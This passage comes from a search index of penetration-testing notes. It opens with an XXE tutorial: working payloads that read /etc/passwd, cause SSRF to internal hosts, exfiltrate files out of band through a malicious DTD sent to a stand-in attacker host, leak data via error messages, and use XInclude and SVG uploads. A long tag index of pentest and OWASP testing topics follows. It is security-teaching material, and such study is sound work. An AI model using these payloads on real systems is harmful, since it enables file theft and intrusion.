                        # example 1\n<?xml version = \"1.0\"?><!DOCTYPE foo [<!ENTITY example1 SYSTEM \"/etc/passwd\"> ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example1;</item>\n    <address>1</address>\n</order>\n\n\n# example 2\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY example2 SYSTEM \"file:///etc/passwd\" > ]>\n<order>\n    <quantity>2</quantity>\n    <item>&example2;</item>\n    <address>1</address>\n</order>\n

                        Encoding techniques

                        # Base encoded XXE\n<?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=file:///etc/passwd\" > ]>\n<name>&nameofEntity;</name>\n

                        This filter return the file base64-encoded to avoid data loss and truncate.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#2-chaining-xxe-to-ssrf-attacks","title":"2. Chaining XXE to SSRF attacks","text":"

                        To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value.

                        <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"http://internal.vulnerable-website.com/\"> ]>\n

                        You would then make use of the defined entity in a data value within the XML.

                        See this lab with an example of exploitation

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#3-blind-xxe-vulnerabilities","title":"3. Blind XXE vulnerabilities","text":"

                        Sometimes the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

                        Blind XXE requires the use of out-of-band techniques, and call the parameter (for example xxe) just after the ENTITY definition. Therefore, XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD.

                        <?xml version = \"1.0\"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM \"http://internal.vulnerable-website.com/\"> %xxe;]>\n

                        You don't need to make use of the defined entity in a data value within the XML as the %xxe; is already calling the entity.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#4-blind-xxe-with-data-exfiltration-out-of-band-blind-xxe-with-oob-data-exfiltration","title":"4. Blind XXE with data exfiltration out-of-band (Blind XXE with OOB data exfiltration)","text":"

                        1. Create a malicious.dtd file:

                        <!ENTITY % file SYSTEM \"file:///etc/passwd\"> \n<!ENTITY % eval \"<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>\"> %eval; %exfiltrate;\n
                        Basically, malicious.dtd retrieves /etc/passwd from the instance in which is executed.

                        2. Serve our malicious.dtd from http://atacker.com/malicious.dtd.

                        3. Submit a payload to the victim via XXE (blind) with a xml parameter entity.

                        <!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/malicious.dtd\"> %xxe;]>\n

                        This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline.

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#5-blind-xxe-to-retrieve-data-via-error-messages","title":"5. Blind XXE to retrieve data via error messages","text":"

                        An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve.

                        • Trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file using a malicious external DTD as follows:
                        <!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error;\n

                        Invoking the malicious external DTD may result in an error message like the following:

                        java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#6-blind-xxe-by-repurposing-a-local-dtd","title":"6. Blind XXE by repurposing a local DTD","text":"

                        If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.

                        Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

                        For example, suppose there is a DTD file on the server filesystem at the location\u00a0/usr/local/app/schema.dtd, and this DTD file defines an entity called\u00a0custom_entity. An attacker can trigger an XML parsing error message containing the contents of the\u00a0/etc/passwd\u00a0file by submitting a hybrid DTD like the following:

                        <!DOCTYPE foo [ \n<!ENTITY % local_dtd SYSTEM \"file:///usr/local/app/schema.dtd\"> \n<!ENTITY % custom_entity ' \n<!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> \n%local_dtd; \n]>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#7-xinclude-attack","title":"7. XInclude attack","text":"

                        In the following scenario, we cannot implement a classic/blind/oob XXE attack because we don't control the entire XML document and so we cannot define the DOCTYPE element.

                        We can bypass this client side verification with XInclude. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. We can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

                        For instance:

                        <d0p xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n<xi:include parse=\"text\" href=\"file:///etc/passwd\"/></d0p>\n

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#8-xxe-via-file-upload","title":"8. XXE via file upload","text":"

                        In a file upload feature, if the application expects to receive a format like .png or .jpeg, then the image processing lib is likely to accept .svg too.

                        Our XXE payload could be:

                        <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#interesting-files","title":"Interesting files","text":"

                        Interesting Windows files Interesting Linux files

                        ","tags":["xxe"]},{"location":"tags/","title":"tags","text":"

                        Following is a list of relevant tags:

                        ","tags":["tags"]},{"location":"tags/#389","title":"389","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#azure","title":"Azure","text":"
                        • Pentesting Amazon Web Services (AWS)
                        • Pentesting Azure
                        ","tags":["tags"]},{"location":"tags/#cms","title":"CMS","text":"
                        • Pentesting MyBB
                        • pentesting wordpress
                        ","tags":["tags"]},{"location":"tags/#cpts","title":"CPTS","text":"
                        • CPTS index
                        • 01. Information Gathering / Footprinting
                        • Pentesting Notes
                        ","tags":["tags"]},{"location":"tags/#cve-2015-6967","title":"CVE-2015-6967","text":"
                        • Nibbles - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#dns-poisoning","title":"DNS poisoning","text":"
                        • DNS poisoning
                        ","tags":["tags"]},{"location":"tags/#dynamics","title":"Dynamics","text":"
                        • Pentesting oDAta
                        ","tags":["tags"]},{"location":"tags/#http","title":"HTTP","text":"
                        • CSRF attack - Cross Site Request Forgery
                        ","tags":["tags"]},{"location":"tags/#microsoft-365","title":"Microsoft 365","text":"
                        • M365 CLI
                        ","tags":["tags"]},{"location":"tags/#mybb","title":"MyBB","text":"
                        • Pentesting MyBB
                        ","tags":["tags"]},{"location":"tags/#nfc","title":"NFC","text":"
                        • Mifare Classic
                        • Mifare Desfire
                        • NFC - Setting up proxmark3 RDV4.01
                        • Proxmark3 RDV4.01
                        ","tags":["tags"]},{"location":"tags/#nfs","title":"NFS","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#ntlm","title":"NTLM","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#ntlm-credential-stealing","title":"NTLM credential stealing","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#network-file-system","title":"Network File System","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#nosql","title":"NoSQL","text":"
                        • Mongo
                        ","tags":["tags"]},{"location":"tags/#oscp","title":"OSCP","text":"
                        • Password attacks
                        ","tags":["tags"]},{"location":"tags/#openflow","title":"Openflow","text":"
                        • 6653 Openflow
                        ","tags":["tags"]},{"location":"tags/#openstack","title":"Openstack","text":"
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#rfid","title":"RFID","text":"
                        • Mifare Classic
                        • Mifare Desfire
                        • RFID
                        ","tags":["tags"]},{"location":"tags/#rfid-pentesting","title":"RFID pentesting","text":"
                        • NFC - Setting up proxmark3 RDV4.01
                        ","tags":["tags"]},{"location":"tags/#smtp","title":"SMTP","text":"
                        • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                        • postfix - A SMTP server
                        ","tags":["tags"]},{"location":"tags/#smtp-server","title":"SMTP server","text":"
                        • postfix - A SMTP server
                        ","tags":["tags"]},{"location":"tags/#snmp","title":"SNMP","text":"
                        • 161-162 SNMP Simple Network Management Protocol
                        ","tags":["tags"]},{"location":"tags/#sql","title":"SQL","text":"
                        • MariaDB
                        • MySQL
                        • sqlite
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#simple-mail-transfer-protocol","title":"Simple Mail Transfer Protocol","text":"
                        • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#wstg-apit-01","title":"WSTG-APIT-01","text":"
                        • Testing GraphQL - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-01","title":"WSTG-ATHN-01","text":"
                        • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-02","title":"WSTG-ATHN-02","text":"
                        • Testing for Default Credentials - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-03","title":"WSTG-ATHN-03","text":"
                        • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-04","title":"WSTG-ATHN-04","text":"
                        • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-05","title":"WSTG-ATHN-05","text":"
                        • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-06","title":"WSTG-ATHN-06","text":"
                        • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-07","title":"WSTG-ATHN-07","text":"
                        • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-08","title":"WSTG-ATHN-08","text":"
                        • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-09","title":"WSTG-ATHN-09","text":"
                        • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-10","title":"WSTG-ATHN-10","text":"
                        • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-11","title":"WSTG-ATHN-11","text":"
                        • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-01","title":"WSTG-ATHZ-01","text":"
                        • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-02","title":"WSTG-ATHZ-02","text":"
                        • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-03","title":"WSTG-ATHZ-03","text":"
                        • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-04","title":"WSTG-ATHZ-04","text":"
                        • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-05","title":"WSTG-ATHZ-05","text":"
                        • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-01","title":"WSTG-BUSL-01","text":"
                        • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-02","title":"WSTG-BUSL-02","text":"
                        • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-03","title":"WSTG-BUSL-03","text":"
                        • Test Integrity Checks - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-04","title":"WSTG-BUSL-04","text":"
                        • Test for Process Timing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-05","title":"WSTG-BUSL-05","text":"
                        • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-06","title":"WSTG-BUSL-06","text":"
                        • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-07","title":"WSTG-BUSL-07","text":"
                        • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-08","title":"WSTG-BUSL-08","text":"
                        • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-09","title":"WSTG-BUSL-09","text":"
                        • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-10","title":"WSTG-BUSL-10","text":"
                        • Test Payment Functionality - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-01","title":"WSTG-CLNT-01","text":"
                        • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-02","title":"WSTG-CLNT-02","text":"
                        • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-03","title":"WSTG-CLNT-03","text":"
                        • Testing for HTML Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-04","title":"WSTG-CLNT-04","text":"
                        • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-05","title":"WSTG-CLNT-05","text":"
                        • Testing for CSS Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-06","title":"WSTG-CLNT-06","text":"
                        • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-07","title":"WSTG-CLNT-07","text":"
                        • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-08","title":"WSTG-CLNT-08","text":"
                        • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-09","title":"WSTG-CLNT-09","text":"
                        • Testing for Clickjackingx - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-10","title":"WSTG-CLNT-10","text":"
                        • Testing WebSockets - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-11","title":"WSTG-CLNT-11","text":"
                        • Testing Web Messaging - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-12","title":"WSTG-CLNT-12","text":"
                        • Testing Browser Storage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-13","title":"WSTG-CLNT-13","text":"
                        • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-14","title":"WSTG-CLNT-14","text":"
                        • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-01","title":"WSTG-CONF-01","text":"
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-02","title":"WSTG-CONF-02","text":"
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-03","title":"WSTG-CONF-03","text":"
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-04","title":"WSTG-CONF-04","text":"
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-05","title":"WSTG-CONF-05","text":"
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-06","title":"WSTG-CONF-06","text":"
                        • Test HTTP Methods - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-07","title":"WSTG-CONF-07","text":"
                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-08","title":"WSTG-CONF-08","text":"
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-09","title":"WSTG-CONF-09","text":"
                        • Test File Permission - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-10","title":"WSTG-CONF-10","text":"
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-11","title":"WSTG-CONF-11","text":"
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-12","title":"WSTG-CONF-12","text":"
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-13","title":"WSTG-CONF-13","text":"
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-01","title":"WSTG-CRYP-01","text":"
                        • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-02","title":"WSTG-CRYP-02","text":"
                        • Testing for Padding Oracle - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-03","title":"WSTG-CRYP-03","text":"
                        • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-04","title":"WSTG-CRYP-04","text":"
                        • Testing for Weak Encryption - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-errh-01","title":"WSTG-ERRH-01","text":"
                        • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-errh-02","title":"WSTG-ERRH-02","text":"
                        • Testing for Stack Traces - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-01","title":"WSTG-IDNT-01","text":"
                        • Test Role Definitions - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-02","title":"WSTG-IDNT-02","text":"
                        • Test User Registration Process - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-03","title":"WSTG-IDNT-03","text":"
                        • Test Account Provisioning Process - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-04","title":"WSTG-IDNT-04","text":"
                        • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-05","title":"WSTG-IDNT-05","text":"
                        • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-01","title":"WSTG-INFO-01","text":"
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-02","title":"WSTG-INFO-02","text":"
                        • nikto
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-03","title":"WSTG-INFO-03","text":"
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-04","title":"WSTG-INFO-04","text":"
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-05","title":"WSTG-INFO-05","text":"
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-06","title":"WSTG-INFO-06","text":"
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-07","title":"WSTG-INFO-07","text":"
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-08","title":"WSTG-INFO-08","text":"
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-09","title":"WSTG-INFO-09","text":"
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-10","title":"WSTG-INFO-10","text":"
                        • Map Application architecture - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-01","title":"WSTG-INPV-01","text":"
                        • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-02","title":"WSTG-INPV-02","text":"
                        • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-03","title":"WSTG-INPV-03","text":"
                        • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-04","title":"WSTG-INPV-04","text":"
                        • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-05","title":"WSTG-INPV-05","text":"
                        • Testing for SQL Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-06","title":"WSTG-INPV-06","text":"
                        • Testing for LDAP Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-07","title":"WSTG-INPV-07","text":"
                        • Testing for XML Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-08","title":"WSTG-INPV-08","text":"
                        • Testing for SSI Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-09","title":"WSTG-INPV-09","text":"
                        • Testing for XPath Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-10","title":"WSTG-INPV-10","text":"
                        • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-11","title":"WSTG-INPV-11","text":"
                        • Testing for Code Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-12","title":"WSTG-INPV-12","text":"
                        • Testing for Command Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-13","title":"WSTG-INPV-13","text":"
                        • Testing for Format String Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-14","title":"WSTG-INPV-14","text":"
                        • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-15","title":"WSTG-INPV-15","text":"
                        • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-16","title":"WSTG-INPV-16","text":"
                        • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-17","title":"WSTG-INPV-17","text":"
                        • Testing for Host Header Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-18","title":"WSTG-INPV-18","text":"
                        • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-19","title":"WSTG-INPV-19","text":"
                        • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-20","title":"WSTG-INPV-20","text":"
                        • Testing for Mass Assignment - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-01","title":"WSTG-SESS-01","text":"
                        • Testing for Session Management Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-02","title":"WSTG-SESS-02","text":"
                        • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-03","title":"WSTG-SESS-03","text":"
                        • Testing for Session Fixation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-04","title":"WSTG-SESS-04","text":"
                        • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-05","title":"WSTG-SESS-05","text":"
                        • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-06","title":"WSTG-SESS-06","text":"
                        • Testing for Logout Functionality - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-07","title":"WSTG-SESS-07","text":"
                        • Testing Session Timeout - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-08","title":"WSTG-SESS-08","text":"
                        • Testing for Session Puzzling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-09","title":"WSTG-SESS-09","text":"
                        • Testing for Session Hijacking - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-10","title":"WSTG-SESS-10","text":"
                        • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#active","title":"active","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#active-directory","title":"active directory","text":"
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • evil-winrm
                        • Microsoft Management Console (MMC)
                        • NT Authority System
                        • PowerUp.ps1
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • SharpView
                        ","tags":["tags"]},{"location":"tags/#active-recon","title":"active recon","text":"
                        • nmap - A network exploration and security auditing tool
                        • Powercat - An alternative to netcat coded in PowerShell
                        ","tags":["tags"]},{"location":"tags/#aes","title":"aes","text":"
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        ","tags":["tags"]},{"location":"tags/#amazon","title":"amazon","text":"
                        • AWS cli
                        ","tags":["tags"]},{"location":"tags/#amazon-web-services","title":"amazon web services","text":"
                        • Amazon Web Services (AWS) Essentials
                        ","tags":["tags"]},{"location":"tags/#android","title":"android","text":"
                        • scrcpy
                        ","tags":["tags"]},{"location":"tags/#apache-cloudstack","title":"apache cloudstack","text":"
                        • Apache CloudStack Essentials
                        ","tags":["tags"]},{"location":"tags/#api","title":"api","text":"
                        • arjun
                        • Hacking APIs
                        • API authentication attacks
                        • Api Reconnaissance
                        • Endpoint analysis
                        • Evasion and combinig techniques
                        • Exploiting API Authorization
                        • Testing for improper assets management
                        • Injection attacks
                        • Mass assignment
                        • Setting up the labs + Writeups
                        • Scanning APIs
                        • SSRF attack - Server-side Request Forgery
                        • Setting up the environment
                        ","tags":["tags"]},{"location":"tags/#arp","title":"arp","text":"
                        • Arp poisoning
                        ","tags":["tags"]},{"location":"tags/#arp-poisoning","title":"arp poisoning","text":"
                        • Arp poisoning
                        ","tags":["tags"]},{"location":"tags/#assessment","title":"assessment","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#attack","title":"attack","text":"
                        • Broken access control
                        • Buffer Overflow attack
                        • Captcha Replay attack
                        • Carriage Return and Linefeed - CRLF Attack
                        • XFS attack - Cross-frame Scripting
                        • CSRF attack - Cross Site Request Forgery
                        • XSS attack - Cross-Site Scripting
                        • Insecure deserialization
                        ","tags":["tags"]},{"location":"tags/#authentication","title":"authentication","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#aws","title":"aws","text":"
                        • AWS cli
                        • Amazon Web Services (AWS) Essentials
                        ","tags":["tags"]},{"location":"tags/#az-104","title":"az-104","text":"
                        • AZ-104 Microsoft Azure Administrator certificate
                        ","tags":["tags"]},{"location":"tags/#az-500","title":"az-500","text":"
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
